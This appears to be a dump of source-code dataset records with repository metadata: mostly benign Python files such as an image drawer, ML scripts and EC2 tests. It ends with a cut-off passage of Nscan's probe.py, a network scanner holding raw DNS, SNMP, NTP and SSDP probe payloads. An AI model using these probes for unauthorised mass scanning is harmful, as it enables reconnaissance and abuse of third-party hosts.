0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc62c8d6aa28b5a801e73fa4abc1d1fe577304dd
1,884
py
Python
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
random-images/hexxy.py
dominicschaff/random
14a19b976a09c768ab8844b7cda237c17a92c9ae
[ "MIT" ]
null
null
null
from PIL import ImageDraw, Image from math import cos,sin,radians from random import randint import sys a = "a0A1b2B3c4C5d6D7e8E9f!F,g.G/h?H<i>I:j;J'k\"K\\l|L/m M\nn\tN@o#O$p%P^q&Q*r(R)s_S-t+T=u{U}v[V]w W x X y Y z Z" if len(a) > 128: print("TOO MANY CHARACTERS") sys.exit(1) # for i in a: # print("%s -> %d %d %d %d %d %d %d "%(i, # 1 if a.index(i) & 1 == 1 else 0, # 1 if a.index(i) & 2 == 2 else 0, # 1 if a.index(i) & 4 == 4 else 0, # 1 if a.index(i) & 8 == 8 else 0, # 1 if a.index(i) & 16 == 16 else 0, # 1 if a.index(i) & 32 == 32 else 0, # 1 if a.index(i) & 64 == 64 else 0, # )) # sys.exit(0) WHITE=(255,255,255) PINK=(217,154,197) BLUE=(103,170,249) BLACK=(0,0,0) img = Image.new('RGB', (2560,1600), BLACK) id = ImageDraw.Draw(img) def hex(offset, size): points = [] x,y = offset for angle in range(0, 360, 60): x += cos(radians(angle)) * size y += sin(radians(angle)) * size points.append((x, y)) return points def drawHex(id, sx,sy,s,c): ox = sx - cos(radians(120)) * s oy = sy - sin(radians(120)) * s id.polygon(hex((ox-s,oy-s*2),s), fill=BLUE if c & 1 == 1 else PINK) id.polygon(hex((ox+s,oy-s*2),s), fill=BLUE if c & 2 == 2 else PINK) id.polygon(hex((ox-s*2,oy),s), fill=BLUE if c & 4 == 4 else PINK) id.polygon(hex((ox,oy),s), fill=BLUE if c & 8 == 8 else PINK) id.polygon(hex((ox+s*2,oy),s), fill=BLUE if c & 16 == 16 else PINK) id.polygon(hex((ox-s,oy+s*2),s), fill=BLUE if c & 32 == 32 else PINK) id.polygon(hex((ox+s,oy+s*2),s), fill=BLUE if c & 64 == 64 else PINK) q = """This is a test 0123456789%""" s = 10 cutOff = int(2560/(s*7)) print (cutOff) x,y = 0,0 for c in q: drawHex(id, s*2 + x*s*7, s*3 + y*s*7, s, a.index(c)) x+=1 if x >= cutOff or c == "\n": x,y = 0,y+1 img.show()
28.545455
113
0.537686
396
1,884
2.555556
0.270202
0.023715
0.027668
0.062253
0.362648
0.352767
0.310277
0.221344
0.221344
0.221344
0
0.107397
0.253716
1,884
66
114
28.545455
0.612376
0.196921
0
0
0
0.204545
0.061252
0.027963
0
0
0
0
0
1
0.045455
false
0
0.090909
0
0.159091
0.045455
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc66cd08fbbe334f7cc1e76eb76063eb07e5b49e
673
py
Python
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
music/distance/aural/diatonic/__init__.py
jedhsu/music
dea68c4a82296cd4910e786f533b2cbf861377c3
[ "MIT" ]
null
null
null
""" *mus . it . dia* The simple diatonic intervals. """ from .second import MinorSecond from .second import MajorSecond from .third import MinorThird from .third import MajorThird from .fourth import PerfectFourth from .fifth import Tritone from .fifth import PerfectFifth from .sixth import MinorSixth from .sixth import MajorSixth from .seventh import MinorSeventh from .seventh import MajorSeventh from .eighth import Octave __all__ = [ "MinorSecond", "MajorSecond", "MinorThird", "MajorThird", "PerfectFourth", "Tritone", "PerfectFifth", "MinorSixth", "MajorSixth", "MinorSeventh", "MajorSeventh", "Octave", ]
18.694444
33
0.708767
68
673
6.955882
0.426471
0.042283
0.067653
0
0
0
0
0
0
0
0
0
0.199108
673
35
34
19.228571
0.877551
0.071322
0
0
0
0
0.203612
0
0
0
0
0
0
1
0
false
0
0.461538
0
0.461538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
fc6780fb69ebe4416f273d6821ceb9f2cb3226e8
760
py
Python
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
selenium_tests/test_functions.py
AriTheGuitarMan/AriTheGuitarMan.github.io
8348ad0c47e48477560e7e40ec7eac8bca6fcdfa
[ "MIT" ]
null
null
null
# this file holds some common testing functions from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.common.by import By depurl = "localhost:3000" def getElement(driver, xpath): return WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, xpath))) def login(driver, username, password): driver.get(depurl) elem = getElement(driver, "//input[@id='username']") elem.clear() elem.send_keys(username) elem = getElement(driver, "//input[@id='password']") elem.clear() elem.send_keys(password) elem.send_keys(Keys.RETURN) def logout(driver): elem = getElement(driver, "//a[text()='Logout']") elem.click()
33.043478
93
0.727632
98
760
5.571429
0.479592
0.117216
0.115385
0.102564
0.175824
0
0
0
0
0
0
0.009146
0.136842
760
23
94
33.043478
0.823171
0.059211
0
0.111111
0
0
0.112045
0.064426
0
0
0
0
0
1
0.166667
false
0.166667
0.166667
0.055556
0.388889
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc69e76506c689aa4c8cc54b37cd338453f7483a
1,256
py
Python
scripts/convert_keras2onnx.py
ecmwf-lab/infero
4fec006175af48cd0313b2f89722c01636e961db
[ "Apache-2.0" ]
8
2021-12-20T06:24:16.000Z
2022-02-17T15:21:55.000Z
scripts/convert_keras2onnx.py
ecmwf-projects/infero
4c229a16ce75a249c83cbf43e0c953a7a42f2f83
[ "Apache-2.0" ]
null
null
null
scripts/convert_keras2onnx.py
ecmwf-projects/infero
4c229a16ce75a249c83cbf43e0c953a7a42f2f83
[ "Apache-2.0" ]
1
2021-10-04T10:14:23.000Z
2021-10-04T10:14:23.000Z
# # (C) Copyright 1996- ECMWF. # # This software is licensed under the terms of the Apache Licence Version 2.0 # which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. # In applying this licence, ECMWF does not waive the privileges and immunities # granted to it by virtue of its status as an intergovernmental organisation # nor does it submit to any jurisdiction. # import os import numpy as np import argparse import keras import keras2onnx if __name__ == "__main__": """ Lightweight script to convert a keras model into a TFlite model """ parser = argparse.ArgumentParser("Data Augmentation") parser.add_argument('keras_model_path', help="Path of the input keras model") parser.add_argument('onnx_model_path', help="Path of the output onnx model") parser.add_argument("--verify_with", help="Check the model by passing an input numpy path") args = parser.parse_args() # load the keras model model = keras.models.load_model(args.keras_model_path) model.summary() # do the conversion onnx_model = keras2onnx.convert_keras(model, model.name) # write to file file = open(args.onnx_model_path, "wb") file.write(onnx_model.SerializeToString()) file.close()
30.634146
95
0.72293
181
1,256
4.878453
0.524862
0.06795
0.057758
0.038505
0.04983
0.04983
0
0
0
0
0
0.009823
0.18949
1,256
40
96
31.4
0.857564
0.33121
0
0
0
0
0.233957
0
0
0
0
0
0
1
0
false
0.058824
0.294118
0
0.294118
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc6bbad5b323947c5f4946373831830060872620
5,961
py
Python
lstm-synthetic-wave-anomaly-detect.py
cse-icon-dataAnalytics/lstm-anomaly-detect
bcfb01db383698acbd5692f1a76a5f20ec3629a8
[ "MIT" ]
178
2016-03-31T05:32:07.000Z
2022-03-26T02:36:35.000Z
lstm-synthetic-wave-anomaly-detect.py
rob-med/lstm-anomaly-detect
bcfb01db383698acbd5692f1a76a5f20ec3629a8
[ "MIT" ]
4
2016-11-01T01:51:06.000Z
2018-04-24T13:42:33.000Z
lstm-synthetic-wave-anomaly-detect.py
rob-med/lstm-anomaly-detect
bcfb01db383698acbd5692f1a76a5f20ec3629a8
[ "MIT" ]
106
2016-03-31T05:32:11.000Z
2021-08-28T09:49:16.000Z
""" Inspired by example from https://github.com/Vict0rSch/deep_learning/tree/master/keras/recurrent Uses the TensorFlow backend The basic idea is to detect anomalies in a time-series. """ import matplotlib.pyplot as plt import numpy as np import time from keras.layers.core import Dense, Activation, Dropout from keras.layers.recurrent import LSTM from keras.models import Sequential from numpy import arange, sin, pi, random np.random.seed(1234) # Global hyper-parameters sequence_length = 100 random_data_dup = 10 # each sample randomly duplicated between 0 and 9 times, see dropin function epochs = 1 batch_size = 50 def dropin(X, y): """ The name suggests the inverse of dropout, i.e. adding more samples. See Data Augmentation section at http://simaaron.github.io/Estimating-rainfall-from-weather-radar-readings-using-recurrent-neural-networks/ :param X: Each row is a training sequence :param y: Tne target we train and will later predict :return: new augmented X, y """ print("X shape:", X.shape) print("y shape:", y.shape) X_hat = [] y_hat = [] for i in range(0, len(X)): for j in range(0, np.random.random_integers(0, random_data_dup)): X_hat.append(X[i, :]) y_hat.append(y[i]) return np.asarray(X_hat), np.asarray(y_hat) def gen_wave(): """ Generate a synthetic wave by adding up a few sine waves and some noise :return: the final wave """ t = np.arange(0.0, 10.0, 0.01) wave1 = sin(2 * 2 * pi * t) noise = random.normal(0, 0.1, len(t)) wave1 = wave1 + noise print("wave1", len(wave1)) wave2 = sin(2 * pi * t) print("wave2", len(wave2)) t_rider = arange(0.0, 0.5, 0.01) wave3 = sin(10 * pi * t_rider) print("wave3", len(wave3)) insert = round(0.8 * len(t)) wave1[insert:insert + 50] = wave1[insert:insert + 50] + wave3 return wave1 + wave2 def z_norm(result): result_mean = result.mean() result_std = result.std() result -= result_mean result /= result_std return result, result_mean def get_split_prep_data(train_start, train_end, test_start, test_end): data = gen_wave() print("Length of Data", len(data)) # train data print "Creating train data..." result = [] for index in range(train_start, train_end - sequence_length): result.append(data[index: index + sequence_length]) result = np.array(result) # shape (samples, sequence_length) result, result_mean = z_norm(result) print "Mean of train data : ", result_mean print "Train data shape : ", result.shape train = result[train_start:train_end, :] np.random.shuffle(train) # shuffles in-place X_train = train[:, :-1] y_train = train[:, -1] X_train, y_train = dropin(X_train, y_train) # test data print "Creating test data..." result = [] for index in range(test_start, test_end - sequence_length): result.append(data[index: index + sequence_length]) result = np.array(result) # shape (samples, sequence_length) result, result_mean = z_norm(result) print "Mean of test data : ", result_mean print "Test data shape : ", result.shape X_test = result[:, :-1] y_test = result[:, -1] print("Shape X_train", np.shape(X_train)) print("Shape X_test", np.shape(X_test)) X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1)) X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1)) return X_train, y_train, X_test, y_test def build_model(): model = Sequential() layers = {'input': 1, 'hidden1': 64, 'hidden2': 256, 'hidden3': 100, 'output': 1} model.add(LSTM( input_length=sequence_length - 1, input_dim=layers['input'], output_dim=layers['hidden1'], return_sequences=True)) model.add(Dropout(0.2)) model.add(LSTM( layers['hidden2'], return_sequences=True)) model.add(Dropout(0.2)) model.add(LSTM( layers['hidden3'], return_sequences=False)) model.add(Dropout(0.2)) model.add(Dense( output_dim=layers['output'])) model.add(Activation("linear")) start = time.time() model.compile(loss="mse", optimizer="rmsprop") print "Compilation Time : ", time.time() - start return model def run_network(model=None, data=None): global_start_time = time.time() if data is None: print 'Loading data... ' # train on first 700 samples and test on next 300 samples (has anomaly) X_train, y_train, X_test, y_test = get_split_prep_data(0, 700, 500, 1000) else: X_train, y_train, X_test, y_test = data print '\nData Loaded. Compiling...\n' if model is None: model = build_model() try: print("Training...") model.fit( X_train, y_train, batch_size=batch_size, nb_epoch=epochs, validation_split=0.05) print("Predicting...") predicted = model.predict(X_test) print("Reshaping predicted") predicted = np.reshape(predicted, (predicted.size,)) except KeyboardInterrupt: print("prediction exception") print 'Training duration (s) : ', time.time() - global_start_time return model, y_test, 0 try: plt.figure(1) plt.subplot(311) plt.title("Actual Test Signal w/Anomalies") plt.plot(y_test[:len(y_test)], 'b') plt.subplot(312) plt.title("Predicted Signal") plt.plot(predicted[:len(y_test)], 'g') plt.subplot(313) plt.title("Squared Error") mse = ((y_test - predicted) ** 2) plt.plot(mse, 'r') plt.show() except Exception as e: print("plotting exception") print str(e) print 'Training duration (s) : ', time.time() - global_start_time return model, y_test, predicted run_network()
30.258883
110
0.631102
843
5,961
4.326216
0.282325
0.021387
0.032904
0.019742
0.178503
0.178503
0.164793
0.157938
0.139841
0.139841
0
0.028331
0.242073
5,961
196
111
30.413265
0.778884
0.045798
0
0.142857
0
0
0.105096
0
0
0
0
0
0
0
null
null
0
0.05
null
null
0.178571
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc6d62eed45d350cb72c202ceedfb98394117cd4
315
py
Python
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
venv/Lib/site-packages/har2case/__about__.py
Verckolf/MyInterfaceTest
e05674bd673a6a43cfb33f7cb4318886ba92a05c
[ "MIT" ]
null
null
null
__title__ = 'har2case' __description__ = 'Convert HAR(HTTP Archive) to YAML/JSON testcases for HttpRunner.' __url__ = 'https://github.com/HttpRunner/har2case' __version__ = '0.2.0' __author__ = 'debugtalk' __author_email__ = 'mail@debugtalk.com' __license__ = 'Apache-2.0' __copyright__ = 'Copyright 2017 debugtalk'
39.375
84
0.771429
38
315
5.526316
0.736842
0.019048
0
0
0
0
0
0
0
0
0
0.038869
0.101587
315
8
85
39.375
0.70318
0
0
0
0
0
0.556962
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc7137abb720c86400bb993740cb9e14c54237f5
8,892
py
Python
tests/integration/ec2/test_connection.py
bopopescu/debpkg_python-boto
06f9b6f3693ba1933be8214da69cebcd5212cd97
[ "MIT" ]
15
2015-03-25T05:24:11.000Z
2021-12-18T04:24:06.000Z
tests/integration/ec2/test_connection.py
bopopescu/debpkg_python-boto
06f9b6f3693ba1933be8214da69cebcd5212cd97
[ "MIT" ]
null
null
null
tests/integration/ec2/test_connection.py
bopopescu/debpkg_python-boto
06f9b6f3693ba1933be8214da69cebcd5212cd97
[ "MIT" ]
10
2015-04-26T17:56:37.000Z
2020-09-24T14:01:53.000Z
# Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/ # Copyright (c) 2009, Eucalyptus Systems, Inc. # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. """ Some unit tests for the EC2Connection """ import unittest import time import telnetlib import socket from nose.plugins.attrib import attr from boto.ec2.connection import EC2Connection from boto.exception import EC2ResponseError class EC2ConnectionTest(unittest.TestCase): ec2 = True @attr('notdefault') def test_launch_permissions(self): # this is my user_id, if you want to run these tests you should # replace this with yours or they won't work user_id = '963068290131' print '--- running EC2Connection tests ---' c = EC2Connection() # get list of private AMI's rs = c.get_all_images(owners=[user_id]) assert len(rs) > 0 # now pick the first one image = rs[0] # temporarily make this image runnable by everyone status = image.set_launch_permissions(group_names=['all']) assert status d = image.get_launch_permissions() assert 'groups' in d assert len(d['groups']) > 0 # now remove that permission status = image.remove_launch_permissions(group_names=['all']) assert status time.sleep(10) d = image.get_launch_permissions() assert 'groups' not in d def test_1_basic(self): # create 2 new security groups c = EC2Connection() group1_name = 'test-%d' % int(time.time()) group_desc = 'This is a security group created during unit testing' group1 = c.create_security_group(group1_name, group_desc) time.sleep(2) group2_name = 'test-%d' % int(time.time()) group_desc = 'This is a security group created during unit testing' group2 = c.create_security_group(group2_name, group_desc) # now get a listing of all security groups and look for our new one rs = c.get_all_security_groups() found = False for g in rs: if g.name == group1_name: found = True assert found # now pass arg to filter results to only our new group rs = c.get_all_security_groups([group1_name]) assert len(rs) == 1 # try some group to group authorizations/revocations # first try the old style status = c.authorize_security_group(group1.name, group2.name, group2.owner_id) assert status status = c.revoke_security_group(group1.name, group2.name, group2.owner_id) assert status # now try specifying a specific port status = c.authorize_security_group(group1.name, group2.name, group2.owner_id, 'tcp', 22, 22) assert status status = c.revoke_security_group(group1.name, group2.name, group2.owner_id, 'tcp', 22, 22) assert status # now delete the second security group status = c.delete_security_group(group2_name) # now make sure it's really gone rs = c.get_all_security_groups() found = False for g in rs: if g.name == group2_name: found = True assert not found group = group1 # now try to launch apache image with our new security group rs = c.get_all_images() img_loc = 'ec2-public-images/fedora-core4-apache.manifest.xml' for image in rs: if image.location == img_loc: break reservation = image.run(security_groups=[group.name]) instance = reservation.instances[0] while instance.state != 'running': print '\tinstance is %s' % instance.state time.sleep(30) instance.update() # instance in now running, try to telnet to port 80 t = telnetlib.Telnet() try: t.open(instance.dns_name, 80) except socket.error: pass # now open up port 80 and try again, it should work group.authorize('tcp', 80, 80, '0.0.0.0/0') t.open(instance.dns_name, 80) t.close() # now revoke authorization and try again group.revoke('tcp', 80, 80, '0.0.0.0/0') try: t.open(instance.dns_name, 80) except socket.error: pass # now kill the instance and delete the security group instance.terminate() # check that state and previous_state have updated assert instance.state == 'shutting-down' assert instance.state_code == 32 assert instance.previous_state == 'running' assert instance.previous_state_code == 16 # unfortunately, I can't delete the sg within this script #sg.delete() # create a new key pair key_name = 'test-%d' % int(time.time()) status = c.create_key_pair(key_name) assert status # now get a listing of all key pairs and look for our new one rs = c.get_all_key_pairs() found = False for k in rs: if k.name == key_name: found = True assert found # now pass arg to filter results to only our new key pair rs = c.get_all_key_pairs([key_name]) assert len(rs) == 1 key_pair = rs[0] # now delete the key pair status = c.delete_key_pair(key_name) # now make sure it's really gone rs = c.get_all_key_pairs() found = False for k in rs: if k.name == key_name: found = True assert not found # short test around Paid AMI capability demo_paid_ami_id = 'ami-bd9d78d4' demo_paid_ami_product_code = 'A79EC0DB' l = c.get_all_images([demo_paid_ami_id]) assert len(l) == 1 assert len(l[0].product_codes) == 1 assert l[0].product_codes[0] == demo_paid_ami_product_code print '--- tests completed ---' def test_dry_run(self): c = EC2Connection() dry_run_msg = 'Request would have succeeded, but DryRun flag is set.' try: rs = c.get_all_images(dry_run=True) self.fail("Should have gotten an exception") except EC2ResponseError, e: self.assertTrue(dry_run_msg in str(e)) try: rs = c.run_instances( image_id='ami-a0cd60c9', instance_type='m1.small', dry_run=True ) self.fail("Should have gotten an exception") except EC2ResponseError, e: self.assertTrue(dry_run_msg in str(e)) # Need an actual instance for the rest of this... rs = c.run_instances( image_id='ami-a0cd60c9', instance_type='m1.small' ) time.sleep(120) try: rs = c.stop_instances( instance_ids=[rs.instances[0].id], dry_run=True ) self.fail("Should have gotten an exception") except EC2ResponseError, e: self.assertTrue(dry_run_msg in str(e)) try: rs = c.terminate_instances( instance_ids=[rs.instances[0].id], dry_run=True ) self.fail("Should have gotten an exception") except EC2ResponseError, e: self.assertTrue(dry_run_msg in str(e)) # And kill it. rs.instances[0].terminate()
36.743802
77
0.587607
1,138
8,892
4.471002
0.269772
0.007665
0.013758
0.01592
0.394654
0.368907
0.338443
0.306997
0.30228
0.30228
0
0.024518
0.334908
8,892
241
78
36.896266
0.835813
0.263383
0
0.52439
0
0
0.09129
0.00775
0
0
0
0
0.170732
0
null
null
0.012195
0.042683
null
null
0.018293
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
fc7fb355e0004487d0ead15c251476f2cd39193b
2,658
py
Python
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
9
2021-03-30T20:43:26.000Z
2021-12-28T06:25:17.000Z
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
null
null
null
datasets/imagenet.py
xhchrn/open_lth
6b3d04a12a2f868ce851bd09b330ea57957c1de6
[ "MIT" ]
2
2021-03-31T01:19:48.000Z
2021-08-02T13:41:32.000Z
# Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import concurrent.futures import numpy as np import os from PIL import Image import torchvision from datasets import base from platforms.platform import get_platform def _get_samples(root, y_name, y_num): y_dir = os.path.join(root, y_name) if not get_platform().isdir(y_dir): return [] output = [(os.path.join(y_dir, f), y_num) for f in get_platform().listdir(y_dir) if f.lower().endswith('jpeg')] return output class Dataset(base.ImageDataset): """ImageNet""" def __init__(self, loc: str, image_transforms): # Load the data. classes = sorted(get_platform().listdir(loc)) samples = [] if get_platform().num_workers > 0: executor = concurrent.futures.ThreadPoolExecutor(max_workers=get_platform().num_workers) futures = [executor.submit(_get_samples, loc, y_name, y_num) for y_num, y_name in enumerate(classes)] for d in concurrent.futures.wait(futures)[0]: samples += d.result() else: for y_num, y_name in enumerate(classes): samples += _get_samples(loc, y_name, y_num) examples, labels = zip(*samples) super(Dataset, self).__init__( np.array(examples), np.array(labels), image_transforms, [torchvision.transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) @staticmethod def num_train_examples(): return 1281167 @staticmethod def num_test_examples(): return 50000 @staticmethod def num_classes(): return 1000 @staticmethod def _augment_transforms(): return [ torchvision.transforms.RandomResizedCrop(224, scale=(0.1, 1.0), ratio=(0.8, 1.25)), torchvision.transforms.RandomHorizontalFlip() ] @staticmethod def _transforms(): return [torchvision.transforms.Resize(256), torchvision.transforms.CenterCrop(224)] @staticmethod def get_train_set(use_augmentation, resize): transforms = Dataset._augment_transforms() if use_augmentation else Dataset._transforms() return Dataset(os.path.join(get_platform().imagenet_root, 'train'), transforms) @staticmethod def get_test_set(resize): return Dataset(os.path.join(get_platform().imagenet_root, 'val'), Dataset._transforms()) @staticmethod def example_to_image(example): with get_platform().open(example, 'rb') as fp: return Image.open(fp).convert('RGB') DataLoader = base.DataLoader
33.225
115
0.677201
341
2,658
5.085044
0.363636
0.057093
0.023068
0.015571
0.113033
0.113033
0.113033
0.087659
0.053057
0
0
0.028612
0.211061
2,658
79
116
33.64557
0.798283
0.072611
0
0.148148
0
0
0.006922
0
0
0
0
0
0
1
0.185185
false
0
0.12963
0.111111
0.444444
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
1
0
0
0
1
fc8903dace15225a2f4484e8807d8da8761b6a96
2,761
py
Python
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
3
2019-10-28T02:52:46.000Z
2019-12-24T09:11:48.000Z
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
null
null
null
hdfs_kernel/exceptions.py
Jasper912/jupyter-hdfs-kernel
4b933cab675cb908a1d2332f040c7fce697fce61
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding=utf-8 -*- # # Author: huangnj # Time: 2019/09/27 import traceback from functools import wraps from hdfs_kernel.constants import EXPECTED_ERROR_MSG, INTERNAL_ERROR_MSG from hdfs.util import HdfsError # == EXCEPTIONS == class SessionManagementException(Exception): pass class CommandNotAllowedException(Exception): pass class CommandExecuteException(Exception): pass # option parse Error class OptionParsingError(RuntimeError): pass class OptionParsingExit(Exception): def __init__(self, status, msg): self.msg = msg self.status = status # == DECORATORS FOR EXCEPTION HANDLING == EXPECTED_EXCEPTIONS = [HdfsError, SessionManagementException, CommandNotAllowedException, CommandExecuteException, OptionParsingExit, OptionParsingError] def handle_expected_exceptions(f): """A decorator that handles expected exceptions. Self can be any object with an "ipython_display" attribute. Usage: @handle_expected_exceptions def fn(self, ...): etc...""" exceptions_to_handle = tuple(EXPECTED_EXCEPTIONS) # Notice that we're NOT handling e.DataFrameParseException here. That's because DataFrameParseException # is an internal error that suggests something is wrong with LivyClientLib's implementation. @wraps(f) def wrapped(self, *args, **kwargs): try: out = f(self, *args, **kwargs) except exceptions_to_handle as err: # Do not log! as some messages may contain private client information self.send_error(EXPECTED_ERROR_MSG.format(err)) return None else: return out return wrapped def wrap_unexpected_exceptions(f, execute_if_error=None): """A decorator that catches all exceptions from the function f and alerts the user about them. Self can be any object with a "logger" attribute and a "ipython_display" attribute. All exceptions are logged as "unexpected" exceptions, and a request is made to the user to file an issue at the Github repository. If there is an error, returns None if execute_if_error is None, or else returns the output of the function execute_if_error. Usage: @wrap_unexpected_exceptions def fn(self, ...): ..etc """ @wraps(f) def wrapped(self, *args, **kwargs): try: out = f(self, *args, **kwargs) except Exception as e: self.logger.error(u"ENCOUNTERED AN INTERNAL ERROR: {}\n\tTraceback:\n{}".format(e, traceback.format_exc())) self.send_error(INTERNAL_ERROR_MSG.format(e)) return None if execute_if_error is None else execute_if_error() else: return out return wrapped
32.482353
119
0.694314
339
2,761
5.530973
0.40118
0.048
0.037333
0.0128
0.1632
0.112
0.088533
0.0608
0.0608
0.0608
0
0.004212
0.226005
2,761
84
120
32.869048
0.873187
0.3908
0
0.428571
0
0
0.031697
0
0
0
0
0
0
1
0.119048
false
0.095238
0.095238
0
0.47619
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
fc97538b8a2ee01ca9533565fe27426b9b8b241a
7,170
py
Python
latest/probe.py
Soldie/Nscan-scanner-ip
4a507ca97a9f8b7f3fa4766c835f108671dbbcd6
[ "Apache-2.0" ]
574
2015-01-30T13:02:42.000Z
2022-03-13T17:12:12.000Z
latest/probe.py
DiamondLink/Nscan
21a8986358107e5b86952cf9276510d14afc5ab6
[ "Apache-2.0" ]
10
2015-01-31T15:36:21.000Z
2021-11-17T10:46:33.000Z
latest/probe.py
DiamondLink/Nscan
21a8986358107e5b86952cf9276510d14afc5ab6
[ "Apache-2.0" ]
173
2015-01-30T13:05:36.000Z
2022-01-22T10:18:10.000Z
import time import Queue import random import socket import struct import logging import threading from convert import * from protocol import ethernet, ip, tcp, udp ETH_P_IP = 0x0800 # IP protocol ETH_P_ALL = 0x0003 # Every packet NSCRIPT_PATH = 'nscript' # NSCRIPT PATH PAYLOAD = { 53:('\x5d\x0d\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x06' 'google\x03com\x00\x00\x01\x00\x01'), # 'google.com' DNS Lookup 161:('\x30\x26\x02\x01\x01\x04\x06public\xa1\x19\x02' '\x04\x56\x9f\x5a\xdd\x02\x01\x00\x02\x01\x00\x30\x0b\x30\x09\x06' '\x05\x2b\x06\x01\x02\x01\x05\x00'), # SNMP GetNextRequest|public|2c version|1.3.6.1.2.1 123:('\x17\x00\x02\x05'), # NTP systats commands lacks 38 null bytes (just to save bandwidth) 1900:('M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n' 'MAN: "ssdp:discover"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n') } class Generator(object): def __init__(self, size): self.size = size self.inc = size/4 if self.inc<1: self.inc = 1 self.base = -self.inc self.num = self.base self.index = 0 def __iter__(self): return self def next(self): if (self.num+self.inc)>=self.size: self.next_index() self.next_base() self.num = self.num + self.inc return self.num def next_base(self): self.base = 0 self.base-= self.index self.num = self.base def next_index(self): self.index+=1 if self.index>=self.inc: raise StopIteration def suspend(self): return self.size, self.inc, self.base, self.num, self.index def resume(self, size, inc, base, num, index): self.size = size self.inc = inc self.base = base self.num = num self.index = index class ScriptEngine(object): def __init__(self, imports): self.imports = imports self.event = threading.Event() self.queues = {} self.thread = [] def Load(self): for script in self.imports: q = Queue.Queue() s = __import__('{}.{}'.format(NSCRIPT_PATH, script), 